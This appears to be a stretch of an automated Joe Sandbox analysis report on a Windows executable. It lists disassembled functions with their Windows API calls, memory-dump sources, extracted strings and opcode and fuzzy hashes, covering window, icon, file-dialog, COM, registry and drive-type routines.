                                                                                                                                                    Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3218148540-0
                                                                                                                                                    • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                    • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                                                    • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                    • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                                                    Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 136442275-0
                                                                                                                                                    • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                    • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                                                    • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                    • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                                                    Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                    • _wcstok.LIBCMT ref: 004674FF
                                                                                                                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                    • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                    • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                    • String ID: X
                                                                                                                                                    • API String ID: 3104067586-3081909835
                                                                                                                                                    • Opcode ID: d09cecb5deb6dd269b96d67ce1f01894bbd120e4dffd6c7162a2683d020f39ff
                                                                                                                                                    • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                                                    • Opcode Fuzzy Hash: d09cecb5deb6dd269b96d67ce1f01894bbd120e4dffd6c7162a2683d020f39ff
                                                                                                                                                    • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                                                    Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                                                    • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                                                    • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                                                    • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                                                    • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                                                      • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                                                      • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                                                      • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                                                    Strings
                                                                                                                                                    • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                    • API String ID: 440038798-2785691316
                                                                                                                                                    • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                                    • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                                                    • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                                    • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                                                    Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                                                    • _wcslen.LIBCMT ref: 004610A3
                                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                                                      • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                                    • API String ID: 4136854206-1241985126
                                                                                                                                                    • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                    • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                                                    • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                    • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                                                    Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                                    • String ID: 2
                                                                                                                                                    • API String ID: 1331449709-450215437
                                                                                                                                                    • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                                    • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                                                    • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                                    • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                                                    Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                    • __swprintf.LIBCMT ref: 00460915
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                                    • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                                                    • API String ID: 3054410614-2561132961
                                                                                                                                                    • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                                    • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                                                    • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                                    • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                                                    Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                                                    • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                                                    • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                    • API String ID: 600699880-22481851
                                                                                                                                                    • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                    • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                                                    • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                    • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                                                    Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DestroyWindow
                                                                                                                                                    • String ID: static
                                                                                                                                                    • API String ID: 3375834691-2160076837
                                                                                                                                                    • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                    • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                                                    • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                    • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                                                    Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                                                    • API String ID: 2907320926-3566645568
                                                                                                                                                    • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                    • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                                                    • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                    • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                                                    Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                    • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00470A04
                                                                                                                                                    • DestroyIcon.USER32(00000000), ref: 00470A1C
                                                                                                                                                    • DeleteObject.GDI32(20FB9A13), ref: 00470A34
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00470A4C
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                                                    • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
